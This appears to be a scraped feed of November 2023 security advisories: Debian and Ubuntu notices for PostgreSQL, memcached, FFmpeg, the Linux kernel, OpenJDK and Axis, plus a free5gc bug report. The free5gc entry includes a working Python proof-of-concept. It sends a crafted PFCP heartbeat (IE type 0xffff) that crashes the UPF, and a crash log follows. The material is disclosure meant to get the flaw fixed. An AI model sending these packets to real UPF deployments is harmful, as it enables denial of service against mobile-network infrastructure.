Debian Linux Security Advisory 5554-1 - Several vulnerabilities have been discovered in the PostgreSQL database system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5554-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
November 13, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : postgresql-13  
CVE ID         : CVE-2023-5868 CVE-2023-5869 CVE-2023-5870 CVE-2023-39417

Several vulnerabilities have been discovered in the PostgreSQL  
database system.

CVE-2023-5868

    Jingzhou Fu discovered a memory disclosure flaw in aggregate  
    function calls.

CVE-2023-5869

    Pedro Gallegos reported integer overflow flaws resulting in buffer  
    overflows in the array modification functions.

CVE-2023-5870

    Hemanth Sandrana and Mahendrakar Srinivasarao reported that the  
    pg_cancel_backend role can signal certain superuser processes,  
    potentially resulting in denial of service.

CVE-2023-39417

    Micah Gate, Valerie Woolard, Tim Carey-Smith, and Christoph Berg  
    reported that an extension script using @substitutions@ within  
    quoting may allow to perform an SQL injection for an attacker having  
    database-level CREATE privileges.

For the oldstable distribution (bullseye), these problems have been  
fixed in version 13.13-0+deb11u1.

We recommend that you upgrade your postgresql-13 packages.

For the detailed security status of postgresql-13 please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/postgresql-13

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmVSk+VfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q9rQ/8Co/OgM7q3kXV9szTFTh0K0s2+7W04CRaNA+BGESpsnKUAG22FApRbGMG  
txECE/zyhih7Bq6knDkjwU1TS3mzd5ra0aQEvuErPcDf1oVAm5rzEf8C2bDBZxqo  
ZuuV03fuh468TQWdUaICoKWueLbSOr0wkh8YLdTOiwSldQg4JkJ2rmWLVx9mxsuT  
5XQRESxgMekCkM3s1H+dIo3Bncf6hW78RYn3oi2i2txwwrEmxsYadaBbvqEkdd/G  
0/mrkaxF/H9g0CCxrVlcHCfGNfcd9aM2mcYjQEUeypb3CV6ybQpWKgwc0hxXFKUS  
ndc9iP/DuOnAJTMOQAzxZ5R4wincO5Godb1x5jdCcSCMOVt/5vj/QF5tAvI/85Rq  
lwgSY/orrB0GeRtNrbi82UZsvLuiOUbgkad3+qEthD+9FQJgTGvMqQqgC6Mr9Ga1  
VVlUwMsZsVjkjbeMm75i7dKi5ya+uqlCdVp3zDw9jGUcfo2+BG2uVepVdoNqWu4b  
X72TdKbZ2sSkSHh4dt6Qyg5GNazix2DvmE+vB2J8jpbodICgAQ43Jq3Hruda4BjD  
V0C8a+u/u3Mh7Kax4niHGTYK666JyTMUqdEkJGtLx59POAdqCpIVi3+lGUSu51x/  
E5pXXHzEuEYCckpxZ0sJctDG1zOCa0BbTNBVYyJEzaAvAhCzpsI=  
=frzV  
-----END PGP SIGNATURE-----

Debian Security Advisory 5554-1

Ubuntu Security Notice 6476-1 - It was discovered that Memcached incorrectly handled certain multiget requests in proxy mode. A remote attacker could use this issue to cause Memcached to crash, resulting in a denial of service, or possibly execute arbitrary code. It was discovered that Memcached incorrectly handled certain proxy requests in proxy mode. A remote attacker could use this issue to cause Memcached to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6476-1November 13, 2023memcached vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 23.04- Ubuntu 22.04 LTSSummary:Several security issues were fixed in memcached.Software Description:- memcached: High-performance in-memory object caching systemDetails:It was discovered that Memcached incorrectly handled certain multigetrequests in proxy mode. A remote attacker could use this issue to causeMemcached to crash, resulting in a denial of service, or possibly executearbitrary code. (CVE-2023-46852)It was discovered that Memcached incorrectly handled certain proxy requestsin proxy mode. A remote attacker could use this issue to cause Memcached tocrash, resulting in a denial of service, or possibly execute arbitrarycode. (CVE-2023-46853)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   memcached                       1.6.21-1ubuntu0.23.10.1Ubuntu 23.04:   memcached                       1.6.18-1ubuntu0.1Ubuntu 22.04 LTS:   memcached                       1.6.14-1ubuntu0.1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6476-1   CVE-2023-46852, CVE-2023-46853Package Information:   https://launchpad.net/ubuntu/+source/memcached/1.6.21-1ubuntu0.23.10.1   https://launchpad.net/ubuntu/+source/memcached/1.6.18-1ubuntu0.1   https://launchpad.net/ubuntu/+source/memcached/1.6.14-1ubuntu0.1

Ubuntu Security Notice USN-6476-1

Debian Linux Security Advisory 5553-1 - Several vulnerabilities have been discovered in the PostgreSQL database system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5553-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
November 13, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : postgresql-15  
CVE ID         : CVE-2023-5868 CVE-2023-5869 CVE-2023-5870 CVE-2023-39417  
                 CVE-2023-39418

Several vulnerabilities have been discovered in the PostgreSQL  
database system.

CVE-2023-5868

    Jingzhou Fu discovered a memory disclosure flaw in aggregate  
    function calls.

CVE-2023-5869

    Pedro Gallegos reported integer overflow flaws resulting in buffer  
    overflows in the array modification functions.

CVE-2023-5870

    Hemanth Sandrana and Mahendrakar Srinivasarao reported that the  
    pg_cancel_backend role can signal certain superuser processes,  
    potentially resulting in denial of service.

CVE-2023-39417

    Micah Gate, Valerie Woolard, Tim Carey-Smith, and Christoph Berg  
    reported that an extension script using @substitutions@ within  
    quoting may allow to perform an SQL injection for an attacker having  
    database-level CREATE privileges.

CVE-2023-39418

    Dean Rasheed reported that the MERGE command to enforce UPDATE or  
    SELECT row security policies.

For the stable distribution (bookworm), these problems have been fixed  
in version 15.5-0+deb12u1.

We recommend that you upgrade your postgresql-15 packages.

For the detailed security status of postgresql-15 please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/postgresql-15

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmVSkZ9fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0TEeA//aemORcM7eOsmMwuyYGoAjpV3o2f6Ji58KN/JunoHAU7TytATJbH1ImSt  
llsXmd4gOnBCrI2HbpFwHTlgP38Ie3XGYh9Ubtb2sfbOWDgOc+OGF9GdgJ2zc50k  
c/iLHIH4MmhPqC8r2aDSHM74iM0W4iXGp6d4APRIUWcTVP9GXCpVucF1WA0Oy+Pw  
wLbqP4yp+w+eyjkZZ7sZ8vx5Q5Yk8YBjaXkoOwlR8+3yp7rzLzM8VHYn8hSQ6JLz  
RJ6/gKizEHNLU1N6fq6UTHNINRq/C5fbwobW5Of8hPr/N+DpzpXI70PXj5DBFC9k  
MNpAsc9DlQN0RFKVIKYWBiotOV6LHKnUZlHNRzNTS+nyUmdQmc7BO0tkSm8ChNF2  
+YPj3LIlZwhgqSn/iI7BA62U5kp3UeF1EoRA1Mfxn7JK2xKo7cq2opluu3dndLIK  
XsLjUcTOGMq6pNosz9lsJNAvqU7a5cSKCEBGHFdxZct1RHkbPNFcZUmsFhAcxpwx  
klHYq1Pl54g1sNZS4KWmTW1TlGKj9d0teC9W8kQ+sGbF3HB5O+RsC+1zAvySMLJ/  
u7U793pwaIc/B8KKSsDTqUe9wLLkNsRT/BDxCfhs7qj/cRP0++dwLDYGHtSzqThg  
B/X8uUrJHsHWJ2IhK+jCpIufOaRSqoozsIqo7FNGbDZlt0ml/h0=  
=CPWu  
-----END PGP SIGNATURE-----

Debian Security Advisory 5553-1

Debian Linux Security Advisory 5552-1 - Several vulnerabilities have been discovered in the FFmpeg multimedia framework, which could result in denial of service or potentially the execution of arbitrary code if malformed files/streams are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5552-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 12, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ffmpegCVE ID         : CVE-2022-4907Several vulnerabilities have been discovered in the FFmpeg multimediaframework, which could result in denial of service or potentially theexecution of arbitrary code if malformed files/streams are processed.For the stable distribution (bookworm), this problem has been fixed inversion 7:5.1.4-0+deb12u1.We recommend that you upgrade your ffmpeg packages.For the detailed security status of ffmpeg please refer toits security tracker page at:https://security-tracker.debian.org/tracker/ffmpegFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVRHAcACgkQEMKTtsN8TjarbhAArIXbV7G++JFpuwnvfFkrmTxT9W9k7puRlFLmnErCKQ4S2GHAd4FmOuTyUDdqIMYtqpRDV30VIQu+TXSmt95Fbms7WStzbcN37s2nELdKWObMYMg60LhscujiJZOJvZGtd4m+btn0Oj71ajcumwOBiqGu8mNI8HBa2gMWQ8z1aol9TzfmcuKE0am4OmheqN3I76wXncSWj8lFqJujD7YESx8liLCBNJ3Lt7lsG9B7Dv9iDcyhADMjX8V5A84OP1eKVEfiTxfHGN+ibFQp3gnopCqTIWf4VXmi+UMBJqvaNyOuKG50pl2qh1dlXq1CIc7mHqrZbMWi7phvunozyOj+o5uzBCtdqZ/jEr5htqGNyXONqzSZUmm+n39mZ5IxZG1DVJ9eZiJNwCBqJ1xOvWYGnT2YOVOIWUhCi3jUIlq809mgZ2bVslN6XqMh8TAEKZ03fuDIlutCHX39fs7hKg0f6GEFQAoN1Kp8G82WSa/qEhJC/3yQcAn3x3dPIPzickWnizYyDXgbO15DnfbG2hPioxI8taXPRBibSkGssXYDyiuHQ4T0x+L39svl5cXdISCpjO/D3U5EsO1M3/4j02lOfEaOlgNCySF/oWWXhXFqybtAcArYVPN8fxfOaWPx96f+VwN4aFl+WlOLP+u2rY9VxLUVWh1lElr8h7cC2wgwClU==V1mm-----END PGP SIGNATURE-----

Debian Security Advisory 5552-1

Zephyr RTOS versions 3.5.0 and below suffer from a multitude of buffer overflow vulnerabilities.

Zephyr RTOS 3.x.0 Buffer Overflows

Ubuntu Security Notice 6465-3 - Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver in the Linux kernel contained a race condition, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service. Lin Ma discovered that the Netlink Transformation subsystem in the Linux kernel contained a null pointer dereference vulnerability in some situations. A local privileged attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6465-3November 10, 2023linux-gke vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gke: Linux kernel for Google Container Engine (GKE) systemsDetails:Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver inthe Linux kernel contained a race condition, leading to a null pointerdereference vulnerability. A local attacker could use this to cause adenial of service (system crash). (CVE-2023-31083)Lin Ma discovered that the Netlink Transformation (XFRM) subsystem in theLinux kernel contained a null pointer dereference vulnerability in somesituations. A local privileged attacker could use this to cause a denial ofservice (system crash). (CVE-2023-3772)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1046-gke     5.15.0-1046.51   linux-image-gke                 5.15.0.1046.45   linux-image-gke-5.15            5.15.0.1046.45After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6465-3   https://ubuntu.com/security/notices/USN-6465-1   CVE-2023-31083, CVE-2023-3772Package Information:   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1046.51

Ubuntu Security Notice USN-6465-3

Ubuntu Security Notice 6462-2 - Seth Jenkins discovered that the Linux kernel did not properly perform address randomization for a per-cpu memory management structure. A local attacker could use this to expose sensitive information or in conjunction with another kernel vulnerability. Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver in the Linux kernel contained a race condition, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6462-2November 10, 2023linux-iot vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-iot: Linux kernel for IoT platformsDetails:Seth Jenkins discovered that the Linux kernel did not properly performaddress randomization for a per-cpu memory management structure. A localattacker could use this to expose sensitive information (kernel memory) orin conjunction with another kernel vulnerability. (CVE-2023-0597)Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver inthe Linux kernel contained a race condition, leading to a null pointerdereference vulnerability. A local attacker could use this to cause adenial of service (system crash). (CVE-2023-31083)Lin Ma discovered that the Netlink Transformation (XFRM) subsystem in theLinux kernel contained a null pointer dereference vulnerability in somesituations. A local privileged attacker could use this to cause a denial ofservice (system crash). (CVE-2023-3772)It was discovered that the Siano USB MDTV receiver device driver in theLinux kernel did not properly handle device initialization failures incertain situations, leading to a use-after-free vulnerability. A physicallyproximate attacker could use this cause a denial of service (system crash).(CVE-2023-4132)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1025-iot      5.4.0-1025.26After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6462-2   https://ubuntu.com/security/notices/USN-6462-1   CVE-2023-0597, CVE-2023-31083, CVE-2023-3772, CVE-2023-4132Package Information:   https://launchpad.net/ubuntu/+source/linux-iot/5.4.0-1025.26

Ubuntu Security Notice USN-6462-2

Buffer Overflow vulnerability in free5gc 3.3.0, UPF 1.2.0, and SMF 1.2.0 allows attackers to cause a denial of service via crafted PFCP messages.

**Describe the bug**

While testing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when it receives special kind of PFCP messages (the secondary IE type is larger than 0x7fff). This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash.

**To Reproduce**

Steps to reproduce the behavior:

1.  Build the UPF with source code
2.  Run the bin/upf with default config/upfcfg.yaml
3.  Run the following POC python script

#!/usr/bin/env python3

import socket

udp\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_DGRAM)
udp\_socket.settimeout(1.0)

pfcp\_association\_setup\_request \= b'\\x20\\x05\\x00\\x1f\\x00\\x00\\x01\\x00\\x00\\x3c\\x00\\x05\\x00\\x0a\\x64\\xc8\\x64\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30\\x00\\x2b\\x00\\x06\\x21\\x00\\x00\\x00\\x00\\x00'

"""
 PFCP Heartbeat Request with a second IE whose type is 0xffff (larger than 0x7fff)
"""
pfcp\_heartbeat\_request \= b'\\x20\\x01\\x00\\x0f\\x00\\x00\\x00\\xff\\xff\\xff\\x00\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30'

udp\_socket.sendto(pfcp\_association\_setup\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.sendto(pfcp\_heartbeat\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.close()

**Expected behavior**

Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check this kind of PFCP messages whose second IE type is larger than 0x7ffff, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF.

**Screenshots**

No special screenshot is provided.

**Environment (please complete the following information):**

*   free5GC Version: v3.3.0
*   OS: Ubuntu 20.04
*   Kernel version: 5.4.5-050405-generic
*   go version: go1.21.1 linux/amd64

**Trace File****Configuration File**

No specific configuration is required.

**PCAP File**

No specific pcap file is provided.

**Log File**

time="2023-09-22T03:25:30.099608396+08:00" level="info" msg="UPF version:  \\n\\tNot specify ldflags (which link version) during go build\\n\\tgo version: go1.21.1 linux/amd64" CAT="Main" NF="UPF"
time="2023-09-22T03:25:30.099702825+08:00" level="info" msg="Read config from \[upfcfg.yaml\]" CAT="CFG" NF="UPF"
time="2023-09-22T03:25:30.102422644+08:00" level="info" msg="\==================================================" CAT="CFG" NF="UPF"
time="2023-09-22T03:25:30.102461710+08:00" level="info" msg="(\*factory.Config)(0xc0004bb0e0)({\\n\\tVersion: (string) (len=5) \\"1.0.3\\",\\n\\tDescription: (string) (len=31) \\"UPF initial local configuration\\",\\n\\tPfcp: (\*factory.Pfcp)(0xc00042d470)({\\n\\t\\tAddr: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\tNodeID: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\tRetransTimeout: (time.Duration) 1s,\\n\\t\\tMaxRetrans: (uint8) 3\\n\\t}),\\n\\tGtpu: (\*factory.Gtpu)(0xc00042d980)({\\n\\t\\tForwarder: (string) (len=5) \\"gtp5g\\",\\n\\t\\tIfList: (\[\]factory.IfInfo) (len=1 cap=1) {\\n\\t\\t\\t(factory.IfInfo) {\\n\\t\\t\\t\\tAddr: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\t\\t\\tType: (string) (len=2) \\"N3\\",\\n\\t\\t\\t\\tName: (string) \\"\\",\\n\\t\\t\\t\\tIfName: (string) \\"\\",\\n\\t\\t\\t\\tMTU: (uint32) 0\\n\\t\\t\\t}\\n\\t\\t}\\n\\t}),\\n\\tDnnList: (\[\]factory.DnnList) (len=1 cap=1) {\\n\\t\\t(factory.DnnList) {\\n\\t\\t\\tDnn: (string) (len=8) \\"internet\\",\\n\\t\\t\\tCidr: (string) (len=12) \\"10.60.0.0/24\\",\\n\\t\\t\\tNatIfName: (string) \\"\\"\\n\\t\\t}\\n\\t},\\n\\tLogger: (\*factory.Logger)(0xc000023c40)({\\n\\t\\tEnable: (bool) true,\\n\\t\\tLevel: (string) (len=4) \\"info\\",\\n\\t\\tReportCaller: (bool) false\\n\\t})\\n})\\n" CAT="CFG" NF="UPF"
time="2023-09-22T03:25:30.102518017+08:00" level="info" msg="\==================================================" CAT="CFG" NF="UPF"
time="2023-09-22T03:25:30.102550910+08:00" level="info" msg="Log level is set to \[info\]" CAT="Main" NF="UPF"
time="2023-09-22T03:25:30.102559413+08:00" level="info" msg="Report Caller is set to \[false\]" CAT="Main" NF="UPF"
time="2023-09-22T03:25:30.114437499+08:00" level="info" msg="starting Gtpu Forwarder \[gtp5g\]" CAT="Main" NF="UPF"
time="2023-09-22T03:25:30.114705992+08:00" level="info" msg="GTP Address: \\"127.0.0.8:2152\\"" CAT="Main" NF="UPF"
time="2023-09-22T03:25:30.133751688+08:00" level="info" msg="buff netlink server started" CAT="BUFF" NF="UPF"
time="2023-09-22T03:25:30.133860807+08:00" level="info" msg="perio server started" CAT="Perio" NF="UPF"
time="2023-09-22T03:25:30.133875168+08:00" level="info" msg="Forwarder started" CAT="Gtp5g" NF="UPF"
time="2023-09-22T03:25:30.135060078+08:00" level="info" msg="starting pfcp server" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:25:30.135468767+08:00" level="info" msg="pfcp server started" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:25:30.135481293+08:00" level="info" msg="UPF started" CAT="Main" NF="UPF"
time="2023-09-22T03:25:44.317661998+08:00" level="info" msg="handleAssociationSetupRequest" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:25:44.317826268+08:00" level="info" msg="New node" CAT="PFCP" CPNodeID="10.100.200.100" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:25:44.318770003+08:00" level="fatal" msg="panic: runtime error: slice bounds out of range \[7:5\]\\ngoroutine 17 \[running\]:\\nruntime/debug.Stack()\\n\\t/snap/go/10339/src/runtime/debug/stack.go:24 +0x5e\\ngithub.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main.func1()\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x4a\\npanic({0x84f480?, 0xc0001c0150?})\\n\\t/snap/go/10339/src/runtime/panic.go:914 +0x21f\\ngithub.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc0001c0140?, 0xc0001c0138?, 0x7f29fbf11548?})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:637 +0x185\\ngithub.com/wmnsk/go-pfcp/message.(\*HeartbeatRequest).UnmarshalBinary(0xc000182630, {0xc0001c0138, 0x15, 0x15})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0xb3\\ngithub.com/wmnsk/go-pfcp/message.Parse({0xc0001c0138, 0x15, 0x15})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x325\\ngithub.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main(0xc0001de0d0, 0xc0001d60d0)\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x48b\\ncreated by github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).Start in goroutine 1\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xb8\\n" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"

CVE-2023-47346: [Bugs] UPF crash caused by PFCP messages whose 2rd IE type larger than 0x7fff · Issue #482 · free5gc/free5gc

Debian Linux Security Advisory 5548-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5548-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 05, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-17  
CVE ID         : CVE-2023-22025 CVE-2023-22081

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 17.0.9+9-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 17.0.9+9-1~deb12u1.

We recommend that you upgrade your openjdk-17 packages.

For the detailed security status of openjdk-17 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-17

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVH8rMACgkQEMKTtsN8  
Tjahiw/+KV2CipWhe7kpI5GXnMkCH9lOIYYv6S/zSu3RpB/zEH72QoAfJVRPazNy  
6ubJtk1kbrkc/mo6RFRw+0yVuo8czZ2NiVYc7E+pmVdCu1QT+M1BlV6xhN9KntpY  
pw2V+/+toyi0lmMRl13FgMC9loUdBHJO7zHbfNCKZAQHoBt1JK1UChwKDUC+UeGr  
0A/4wk5gMaKLMizr5nSEXsJS1D0cnAeqogIU42G6MdHTQnF1dTtXOtA3VbS+AnAl  
cPea29ALDnpruizp/7pBCu4q9hGvCrKYHxZ5ZIwfS7shfYSN0qqAtqmsw8ZSnAp6  
MlPwbdKfYWFhujvT3prQEtgPqowK+sMjSRHvjZyXIYrYK6/ORduckVpSHN3Ue3V7  
UcFKiZvVrub6YB9nFB0fbHs7FL4N/Eb75n8B5OzaHM1RrH12NNKWw9aghHEMofQB  
Isai5wglPnERZqDOYuUnrwxBfsRKGbRsYl86wYCnDBYSDtO5o6Fdp5daZBtm40dl  
fo4GoM2FVlkIFKR/xLviQ/l+q8bc3jOcT4ZtgiVlYHD5YuunT9pMxOYHHMF4NeP7  
ve+hB46m3GxVgeu50L3e7bOLEDbsMwXbhzN+IvR1IBNuwEvXUWy0jg4GZJQ30u7b  
l10rG4HjAvcL0U/axHmQcaKZWwd9cc9EfbQMUTJ5UzuSN9YcutA=  
=vysv  
-----END PGP SIGNATURE-----

Debian Security Advisory 5548-1

Ubuntu Security Notice 6470-1 - It was discovered that Axis incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6470-1  
November 02, 2023

axis vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Axis could be made to crash or execute arbitrary code if it received specially  
crafted input.

Software Description:  
- axis: SOAP implementation in Java

Details:

It was discovered that Axis incorrectly handled certain inputs. If a user or  
an automated system were tricked into opening a specially crafted input file,  
a remote attacker could possibly use this issue to cause a denial of service  
or execute arbitrary code. (CVE-2023-40743)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libaxis-java                    1.4-28+deb10u1build0.23.10.1  
   libaxis-java-doc                1.4-28+deb10u1build0.23.10.1

Ubuntu 23.04:  
   libaxis-java                    1.4-28+deb10u1build0.23.04.1  
   libaxis-java-doc                1.4-28+deb10u1build0.23.04.1

Ubuntu 22.04 LTS:  
   libaxis-java                    1.4-28+deb10u1build0.22.04.1  
   libaxis-java-doc                1.4-28+deb10u1build0.22.04.1

Ubuntu 20.04 LTS:  
   libaxis-java                    1.4-28+deb10u1build0.20.04.1  
   libaxis-java-doc                1.4-28+deb10u1build0.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   libaxis-java                    1.4-25ubuntu0.1~esm1  
   libaxis-java-doc                1.4-25ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libaxis-java                    1.4-24ubuntu0.1~esm1  
   libaxis-java-doc                1.4-24ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6470-1  
   CVE-2023-40743

Package Information:  
   https://launchpad.net/ubuntu/+source/axis/1.4-28+deb10u1build0.23.10.1  
   https://launchpad.net/ubuntu/+source/axis/1.4-28+deb10u1build0.23.04.1  
   https://launchpad.net/ubuntu/+source/axis/1.4-28+deb10u1build0.22.04.1  
   https://launchpad.net/ubuntu/+source/axis/1.4-28+deb10u1build0.20.04.1

Tag

#dos